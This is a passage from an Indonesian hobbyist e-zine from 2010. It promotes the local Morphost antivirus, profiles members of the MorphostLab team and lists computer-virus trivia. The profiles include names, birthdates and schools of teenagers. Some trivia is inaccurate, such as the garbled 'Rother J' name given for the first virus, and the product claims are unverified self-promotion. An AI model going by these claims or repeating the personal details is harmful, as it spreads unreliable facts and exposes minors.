Sekian, artikel ini saya tulis. Mudah-mudahan bisa memberikan inspirasi buat kamu!!

Artikel ini juga dapat Anda baca di http://morphians.wordpress.com/2010/03/09/deteksi-module-virus-sality-tanpa-checksum/

40


Our Product :

Morphost Expert Plus!

K

ini, MorphostLab lagi-lagi merilis produk antivirusnya di Indonesia. Versi kali ini jauh lebih baik dibanding Morphost Expert yang biasa. Karena pada versi kali ini sudah cukup

banyak kesalahan lama yang sudah diperbaiki. Selain itu ada penambahan metode

heuristik atau metode pendeteksian malware (virus/worm/trojan) baru pada Morphost Expert Plus.

Mengapa Morphost antivirus dikembangkan?

Ada banyak latar belakang dan alasan kenapa Morphost Antivirus masih terus dikembangkan. Melihat penyebaran malware di Indonesia yang belum terhenti juga, maka sangatlah baik bila antivirus-antivirus lokal yang ada di Indonesia mau bekerja sama untuk memberantas malwaremalware tersebut.

Ditambah lagi, Morphost Antivirus merupakan salah satu antivirus lokal terbaik yang dimiliki Indonesia. Dan jumlah penggunanya juga menunjukkan angka yang tinggi. Dan Morphost juga termasuk 5 antivirus lokal yang mempunyai pengaruh besar di Indonesia.

Berangkat dari permasalahan dan alasan tersebut maka dikembangkanlah suatu antivirus lokal yang disebut Morphost Antivirus.

41

Morphozine Edisi 1 - April 2010 Apa saja kelebihan Morphost Expert Plus?

Morphost Expert Plus mampu deteksi virus Impor/Internasional Sudah semakin banyak virus impor yang mampu dideteksi oleh Morphost versi ini. Jangan salah

paham. Yang dimaksudkan disini bukan lah induk virusnya, karena pendeteksian induk virus tidak lah sulit. Melainkan virus impor yang dimaksudkan disini adalah pendeteksian terhadap FILE-FILE YANG TERINFEKSI VIRUS IMPOR/INTERNASIONAL.

Kini Morphost Expert Plus mampu mendeteksi file-file yang terinfeksi virus Sality, Alman, Virut,

Troxa atau Drowor, Runonce atau Runouce atau ChirB@mm, Pharaoh atau Mabezat.B, Tenga atau Gaelicum, Sohanad, Parite, Fosforo, beberapa varian Silly, Funlove.4070, Funlove.3662, Alcaul dan beberapa varian Paradise. Dan beberapa detektor virus khusus Induc, Agent, Small, Xorer dan

sebagian varian Silly masih dalam pengembangan. Untuk mendeteksi file-file terinfeksi virus di atas, tentunya tidak pakai checksum ataupun pemeriksaan string, melainkan dengan metode heuristik milik Morphost.

Beberapa virus diatas hanya dapat dideteksi Morphost Antivirus. Dan tidak tertutup kemungkinan bahwa Morphost bisa menjadi antivirus lokal yang paling banyak mendeteksi file terinfeksi virus.

Morphost Expert Plus lebih cepat daripada Morphost Versi 6 ke bawah Hal ini sudah kami uji dengan pembandingan Morphost Expert yang satu ini dengan Morphostmorphost yang lama. Selain itu kami juga membandingkan kecepatan Morphost ini dengan hampir

semua antivirus lokal yang ada. Dan hasil dari pembandingan, kecepatan Morphost Expert Plus jauh di atas nilai rata-rata kecepatan antivirus lokal.

Database Morphost sangat ringan Untuk saat ini database Morphost yang bersifat eksternal ini masih berukuran dibawah 20KB. Bayangkan, butuh berapa lama untuk mendownload file yang berukuran 20KB??? Database Morphost bersifat eksternal jadi user tidak perlu susah-susah mendownload ulang scanner utama antivirus (karena databasenya bersifat internal).

Selain itu, database Morphost diisi dengan 500 signature virus. Tim MorphostLab sendiri sudah memilah-milah virus-virus yang sudah punah dengan virus-virus yang masih menyebar. Jadi, signature VIRUS YANG SUDAH PUNAH tidak ada lagi dalam database Morphost. Signature

virus dalam database Morphost pun dilengkapi dengan HiddenSignature dan

InternalDatabase. HiddenSignature sengaja dibuat untuk pendeteksian varian-varian virus yang sudah dikenal sebelumnya. Dan virus-virus varian baru yang varian lamanya sudah terdeteksi biasanya akan terdeteksi juga.

Lalu, InternalDatabase yang kami maksudkan disini adalah database khusus pendeteksian file terinfeksi virus impor dan virus lokal yang tipe infeksinya mirip. Internaldatabase ini tidak perlu diupdate karena memang merupakan metode heuristik milik Morphost.

Morphost menggunakan Metode Pendeteksian yang baru Metode pendeteksian yang dipakai Morphost tergolong masih baru dan ampuh. Kami sebut baru

karena masih belum ada antivirus lokal lain yang memakai teknik tersebut. Salah satu metode

42

Morphozine Edisi 1 - April 2010 scanning yang dipakai Morphost adalah dengan HiddenSignature yang cukup akurat untuk mendeteksi varian-varian baru dari varian virus lama. Selain itu metode lainnya adalah heuristik dengan pemeriksaan rutin PE setiap file aplikasi. Khusus untuk pemeriksaan PE, telah

dikembangkan juga heuristik baru untuk pendeteksian 7 tipe/jenis infeksi umum oleh virus. Metode ini akan saling membantu atau mensupport detektor-detektor virus yang sudah disebut di atas tadi.

Metode-metode ini sudah diuji dan tergolong ampuh oleh sekelompok tester-tester pilihan MorphostLab.

Morphost Antivirus Lokal dipersembahkan untuk Indonesia Morphost antivirus lokal ini bersifat gratis ataupun freeware dan tidak ada garansi selama penggunaan antivirus lokal ini. Morphost merupakan antivirus lokal buatan Indonesia yang sengaja

diciptakan untuk pemberantasan malware lokal khususnya worm lokal secara tuntas. Morphost Antivirus fokus terhadap semua malware baik itu lokal maupun non lokal yang membandel di Indonesia, dan terlebih lagi pada file-file yang terinfeksi virus impor. Dalam hal ini Morphost lebih mengutamakan pencegahan dan perlindungan virus impor terhadap komputer/laptop Indonesia.

Antivirus lokal ini menggunakan bahasa pengantar Indonesia untuk kemudahan penggunaan dan tampilan yang sederhana ataupun tidak rumit. Tentunya user akan lebih mudah beradaptasi ataupun menggunakan Morphost Antivirus lokal ini.

Morphost Antivirus Expert Plus sudah kami sertakan bersama Morphozine ini. Namun juga bisa Anda unduh atau download melalui link ini: Download Morphost

43


60 Menit Bersama

MorphostLab Team Wah, judulnya kaya konser musik aja nih. Hehe, tenang-tenang, gak usah takut. Walaupun

judulnya ada tulisan '60 Menit' alias 1 jam, artikel ini gak selama itu kok. Isinya juga bukan tutorial atau source code apapun, 'cuma' berisi tentang profil MorphostLab Team. Jadi, kalo gak dibaca juga gak apa-apa. Tapi, karena kamu dah terlanjur baca, baca sampai selesai sekalian ya. ;)

OK, basa-basinya dah selesai, to the point ya. Awal mulanya MorphostLab hanya berisi satu

orang, yaitu Morphic sebagai pendirinya. Lalu, lama kelamaan, dengan semakin berkembanya

MorphostLab, tentu dibutuhkan sumber daya tambahan. Nah, sekitar bulan Oktober 2009, Morphic membuka pendaftaran anggota baru MorphostLab. Ribuan pendaftar pun mengirim berkas-berkas yang diminta oleh Morphic ke emailnya. Hehe, becanda, ga sampai ribuan kok. Dan

akhirnya, sampai tulisan ini ditulis, MorphostLab telah memiliki 35 anggota resmi. Mereka semua tergabung dalam MorphostLab Malware Research [B]. Berikut adalah daftar anggota resmi MorphostLab : [Founder] •

Morphic Karta from FK USU Medan

[Advertiser & Distributor Group] •

Adam Hidayat [Boss of Group 1] from MTsN Model Cigugur Kuningan

•

Axer [Boss of Group 2] from FH USU Medan

•

Sonya A.M from FK USU Medan

•

Adie from Aceh

•

Irez from SMAN Modal Bangsa Aceh

[Designer Group] •

Aditia [Boss of Group]

•

Xhadow from SMAN 1 Pamekasan

•

Rully from SMK Cikini

•

Gusti Grunge from SMK N 3 Gunung Keling

[Independent Group] •

Kholis [Boss of Group 1]

•

Muamar Kudo [Boss of Group 2] from SMAN 1 Bukateja (Jateng)

•

Adoet Kira from SMAN 2 Kalimantan Tengah

•

Coe88 from UNPI Cianjur

•

Yose Rizal from FK USU Medan

•

Lidia Bangun from FK USU Medan

•

Azwar from MAN Sidoarjo

44

Morphozine Edisi 1 - April 2010 •

Abednego from FK USU Medan

•

Tunggul from FK USU Medan

•

Tiop from FK USU Medan

•

Igen from UNIBI

[VirusAnalyst Group] •

SatryaCode [Master of Boss] from IT USU Medan

•

Shafry [Boss of Group 1] from SMP N 5 Kepanjen

•

Faiz from SMAN 2 Medan

•

Yoga from SMKN 7 Samarinda

•

RobzLabz from SMAN 4 Yogyakarta

•

Supernatural from SMAN 2 Kisaran

•

Azhari from Politeknik Negeri Pontianak

•

Swandy from SMP Gamaliel Makassar

[VirusCaptor Group] •

Yudha [Master of Boss] from Jakarta

•

Nash [Boss of Group 1] from Yogyakarta

•

Sid Revi MorEset32 [Boss of Group 2] from SMA N 24 Bandung

•

Neo Bekabe [Boss of Group 3]

•

Adnan S4dly from SMAN 2 Sinjai, Sulawesi Selatan

•

Kido from SMP IPH Surabaya

•

Riedel from Univ. Negeri Manado Berikut adalah profil dari beberapa anggota MorphostLab.

Morphic Karta

Memiliki nama asli Samuel Pola Karta Sembiring. Lahir di Medan tanggal 21 April 1991.

Sekarang aktif menjadi mahasiswa semester dua Fakultas Kedokteran Universitas Sumatera Utara dan baru saja menjadi alumni SMA Negeri 1 Medan.

Sejak kecil tidak menyukai bidang IT dan semua waktunya dihabiskan untuk bermain

musik, menggambar dan menulis novel. Menguasai pemrograman Visual Basic 6, Visual Basic Net,

Macro Word, Visual Basic Script saat duduk di bangku kelas 1 SMA. Semuanya dikuasai secara otodidak. Tidak ada motivasi dan tidak ada maksud tertentu untuk mempelajari itu semua. Semuanya itu dilakukan hanya untuk memenuhi kesenangan isengnya saja.

Kini dia aktif menjadi pimpinan MorphostLab, administrator di Morphorum, dan menjabat

moderator yang memegang dua bagian sekaligus di Virologi Indonesia.

Remaja yang bercita-cita menjadi dokter ini juga aktif menulis banyak artikel dan tutorial

virus maupun antivirus yang sudah banyak beredar di hampir semua web virologist Indonesia. Ketertarikannya pada malware mulai muncul

saat masih di SMP dan mulai aktif membuatnya saat masuk

sekolah

SMA-nya.

Sedangkan

pembuatan

Blog : www.morphostlab.co.nr Forum: www.morphorum.co.nr Email: [email protected]

antivirus Morphost dimulai pada semester dua dan diselesaikannya selama dua setengah tahun.

45


SatryaCode

Mahasiswa Fakultas IT Universitas Sumatera Utara ini merupakan 'Master Of The Boss' dari

divisi VirusAnalyst Group MorphostLab. SatryaCode memiliki cerita unik bagiamana ia bisa berkenalan dengan Morphic, berikut kisahnya :

"Awal mula mengenal Morphost saat saya masih duduk di bangku kelas 2 SMA. Ketika itu saya sedang asyik bermain game tetapi ada sesuatu yang membuatku kurang nyaman, yaitu di tengah jalannya game tersebut selalu muncul pesan error yang mengatakan “File bla bla bla is missing...” Karena ketidak nyamanan itu akhirnya saya mengoprek “daleman” XP yang saya gunakan dan saya menyimpulkan kalau XP saya kena worm local. Karena saya rasa ada kesenangan tersendiri pada bagian itu, saya memutuskan konsen ke dunia worm, virus dan Antivirus. Awal mulanya saya mencoba untuk membuat antivirus, tapi ya tidak sampai setengah tahun antivirus itu saya tinggalkan karena tidak adanya ilmu yang mendukung. Nah, setelah jalan-jalan ke blog-blog local, saya ketemu ke blognya Morphost (www.morphostlab.co.nr). Dan dari blog itu saya mulai mendalami ilmu menganalisa virus dan worm. Namun, sampai situ saya kurang ngerti kalau dengan tulisan saja, saya mencari akal gimana caranya agar bisa ketemu dengan yang mempunyai blog tersebut. Setelah sekian bulan saya menyadari kalau yang mempunyai blog itu juga orang Medan bahkan dia sekolah di SMA yang saya sudah kenal yaitu SMA 1 Medan. Karena merasa dekat dengan yang mempunyai blog itu, saya semakin penasaran ingin bertemu dengan dia, siapa dia ?? Dia adalah si Morphic.. Awalnya ketika saya ingin mencarinya ke sekolahnya itu, saya tidak ketemu dengan dia, bahkan ada yang mengatakan 'Siapa morphic?? Anak mana Web : www.virusanalyst.org Blog : www.satryacode.us.to dia?? Perasaan di SMA 1 mana ada yang namanya morphic..' Email: [email protected] Karena kesal lantaran di bohongi saya kirim email ke dia. Bla bla bla bla… akhirnya dia ngasi nama aslinya, yaitu Samuel Pola Karta, nah seterusnya saya

belajar dari dia, mulai dari 0 sampai sekarang (belum masuk 1). ☺ Hingga sekarang ini saya masih senang menganalisa virus (newbie mode) dan nganalisa worm yang tujuannya untuk diriku dan orang yang minta tolong untuk di cariin virus di dalam tanktop nya … eh, laptop nya. "

Yudha

Sobat yang biasa dipanggil Yudha ini memiliki nama lengkap Angga Emir Yudha, S.T.

Memilik minat pada Architecture Designer, Freelance, ArchiCAD Tutorial dan memiliki hobi Blogging, Browsing, Googling, Virus Captor, Walking Alone, Melihat Sunset di Pantai, hingga Baca

Buku. Ia sudah cukup lama bergabung dengan MorphostLab, bahkan saat ini ia telah menjabat 'Master of The Boss' Virus Captor Team. Berikut adalah cerita bagaimana ia bergabung dengan MorphostLab :

"Aq kenal morphost sebenarnya dari hasil googling ketika mencari apa itu yang dimaksud dengan virus brontok, dan gak sengaja aq nemu situsnya Blog : yudha-arch.blogspot.com Email: [email protected] virologi.info dan salah satu member yang aktif adalah morphic. Waktu itu dia sering mem-promosikan antivirusnya yaitu morphost. Langsung saja aq download dan q coba, setelah aq pakai, ternyata lumayan bagus juga morphost ini. Virus yang pertama kali aq upload di 4shared morphic adalah virus conficker dan

46


autorun.inf nya conficker. Dan sejak saat itu aq lumayan sering mengirimkan sampel-sampel virus lokal maupun luar. Dan suatu hari morphic mengajakku masuk ke dalam team morphost yang akan di bentuknya, aq masuk dalam grup virus captor. (untuk viruscaptor lainnya, sering-sering lah kalian pinjam flash disk teman kalian, biasanya ada barang berharga tuh didalamnya...he..he.. biasa... virus tentunya) Hal positif yang aq rasa dari morphost, makin hari semakin bagus daya deteksinya, mudah-mudahan morphic selaku founder dari morphost dapat selalu menemukan cara-cara terbaru dan terkini dalam membuat sebuah heur terbaru atau vaksin untuk membasmi virus baik lokal maupun luar. (aq tau masih banyak ide dalam pikiranmu phic... tetap semangat yoo, walaupun sekarang duniamu bertambah... + dunia kedokteran) Alasan aq masuk dan menerima ajakan morphic ketika itu adalah: • aq melihat morphost sebagai salah satu dari sekian banyak antivirus lokal terbaik Indonesia. • morphic selaku foundernya dari yg aq kenal selama ini adalah seorang yang gak sombong, selalu merespon pertanyaan atau kritikan dengan baik, suka memberikan bocoran atau tips-tips kepada orang lain khususnya AV maker juga Vimaker. (Sebenarnya sebelum masuk morphostlab, aq sering berkunjung ke blog morphostlab, Cuma aq lihat-lihat saja tanpa memberikan komentar. He..he.. ) • Orang-orang yang datang ke blog morphostlab selalu sopan dan cinta damai, misalnya ketika itu seperti Satryacode, neo bekabe, dll. • Ingin membantu dan secara sukarela meng-upload virus yang aq temukan. • Iseng saja.... , secara, beberapa bulan lalu aq sangat-sangat sering online, jadi tak ada salahnya.. Wah-wahh... sejak masuk morphostlab, Blog ku lumayan ramai lho... Thanks untuk semuanya, morphic, teman-teman morphostlab team... sukses selalu untuk kalian semuanya ya... Untuk teman-teman, kunjungi blog ku ya... jangan lupa komennya dan follownya... "

Nash Memiliki nama langkap Nashihun Amien. Saat ini masih berstatus mahasiswa di Universitas

Islam Indonesia. Saat ini ia berusia sekitar 18 tahun. Memiliki minat pada dunia networking. Ia mengenal Morphic dari Virologi.info. dan menjadikan Blog :nash-notes.blogspot.com Morphic sebagai inspirasi. Setelah itu ia berusaha Email:[email protected] mencari nomor HP Morphic dan akhirnya mendapatkannya setelah 1 bulan melakukan pencarian.

Muamar Kudo

Remaja yang masih berstatus pelajar kelas XI di SMAN 1 Bukateja, Purbalingga ini memiliki

minat tinggi dalam bidang matematika dan IT (terutama virologi). Lahir di Purbalingga pada 03 Maret, belasan tahun yang lalu. Memiliki nama asli yaitu Arif Muamar. Awal mula memiliki minat terhadap bidang virologi

ketika komputer sendiri sering sekali terkena virus sehingga harus di install ulang. Kemudian mencari tahu seluk beluk

Blog :www.Kudosoft.co.nr Email:[email protected] Dir :kudo.4shared.com

tentang virus maupun antivirus. Hingga akhirnya sekitar bulan Juni 2009, menemukan blog

47

Morphozine Edisi 1 - April 2010 MorphostLab. Ia lalu terinspirasi oleh Morphic yang mampu membuat antivirus Morphost. Karena itulah, kemudian merasa tertarik ingin membuat AntiVirus sendiri (Codename: ExAV) meski hingga

kini belum dapat terealisasi T.T. Saat itu mulai mengenal Morphic dan Morphost. Dan secara

teratur mengikuti perkembangan Morphost hingga kini. Sekitar bulan Januari 2010 bergabung dengan Independent Team hingga saat ini telah menjadi 'Boss Of Group'.

Ahmad Shafry

Lahir di Malang, 25 September 1994. Saat ini bersekolah di SMPN 5 Kepanjen, namun

sebentar lagi akan melanjutkan ke sekolah lain (baca: SMA). Memiliki minat terhadap bidang komputer (IT) dan bercita-cita menjadi Programmer. Mahir dalam Visual Basic dan VisualBasic Scrip (VBS). Saat ini sudah

Blog :www.antiviri.co.cc Email:[email protected]

bisa membuat antivirus buatannya sendiri yang bernama Knight AV. Selain itu, ia juga sudah berhasil membuat beberapa virus. Dari virus Batch hingga virus yang dibuat dengan bahasa VB. Mengenal Morphost sejak kurang lebih 2 tahun lalu ketika kelas 2 SMP.

Muhammad Nur Kholis Memiliki nama lain/nick Kholis Virologist. Usianya baru sekitar 15 tahun dan memiliki minat dalam bidang programmer. Ia berasal dari daerah Pasuruan, Jatim. Selain tergabung di Independent Team MorphostLab, ia juga tergabung dalam tim Support Publisher Codenesia. Saat ini ia masih bersekolah di SMP N 11 Pasuruan. Awal mulanya berkenalan dengan Morphic adalah saat ia mengunjungi forum dan web Virologi.info.

Adam Hidayat

Remaja yang sejatinya memiliki hobi main basket ini bersekolah di SMK 3 Gunung Keling.

Berusia sekitar 16 tahun. Ia memiliki minat untuk mencari cewe setia -- katanya lho, hehe. Ia

mengaku mengenla Morphost dari temannya, yaitu Revi (anggota MorphostLab juga). Ia ditawari untuk ikutan bergabung dan langsung ia cek ke TKP. Dan saat itupun ia diterima di divisi A & D (Advertiser & Distributor).

48


Gambar diatas menunjukkan foto beberapa anggota MorphostLab yang sedang berfikir keras demi kemajuan bangsa (halah..hehe), Mungkin kamu tanya, 'fotonya Morphic yang mana ya?' atau 'Mas SatryaCode tu yang mana?' Silakan cari tau sendiri ya...xixixi :)

49


Did You Know ? •

Pada tahun 1949, John von Neumann, mempublikasikan teorinya tentang 'cellular automata' bahwa sebuah prgram komputer bisa mereproduksi dirinya sendiri.

•

•

Virus komputer pertama adalah sebuah program bernama 'Rother J', ditulis oleh Richard

Skrenta yang menyebar via floppy disk. Saat penggunanya memakai komputer saat ke 50 kali, virus akan aktif, menginfeksi komputer dan menampilkan pesan "Elk Cloner: The program with a personality." • •

Virus HP (Mobile) pertama ditemukan pada Juni 2004. Saat itu sebuah perusahaan bernama Ojam membuat sebuah virus anti-pembajakan di game mobile buatan mereka. Virus ini mengirim SMS ke perusahaan tersebut tanpa diketahui oleh pemiliknya.

• •

Virus Brontok mungkin adalah satu-satunya virus asal Indonesia yang dibuatkan halaman khusus di Wikipedia.

•

•

Conficker yang beberapa waktu lalu begitu 'booming' memiliki nama yang beraal dari kata

bahasa Inggris 'Configure' dan kata bahasa Jerman 'Ficker' yang berarti 'Fucker'. Itulah analisis dari Joshua Phillips, analis Microsoft. • •

Conficker memiliki 5 varian, Conficker A, B, C, D dan E. Varian itu semua mulai diketahui pada 21 November 2008, 29 Desember 2008, 20 Februari 2009, 4 Maret 2009 dan 7 April 2009.

• •

Worm Nimda yang jika dibaca terbalik yaitu 'admin' menyebar sejak 18 September 2001

atau tepat 1 minggu setelah serangan 11 September. Hal ini menimbulkan dugaan bahwa ada hubungan antara worm tersebut dengan Al Qaeda, meski sampai saat ini tak terbukti. • •

Malahan, dalam tubuh Nimda, ditemukan teks "Concept Virus(CV) V.5, Copyright(C)2001 R.P.China"

• •

Worm I-LOVE-YOU menyebar di Filipina sejak 5 Mei 2000 dan menyebar ke seluruh dunia dalam 1 hari. Guzman.

Worm ini dibuat oleh 2 pelajar Filipina, Reomel Ramones dan Onel de

• •

Worm I-LOVE-YOU ini menyebar lewat email dan memaksa Pentagon, CIA dan korporasi besar lainnya mematikan sistem email mereka.

50

Jenuh karena Virus ?

...

www.morphostlab.co.nr

Gunakan Morphost Expert Plus !

Source Code Fakta Virus Deteksi Virus RunOnce! Source Code Virus Macro Polymorphic

Recommend Documents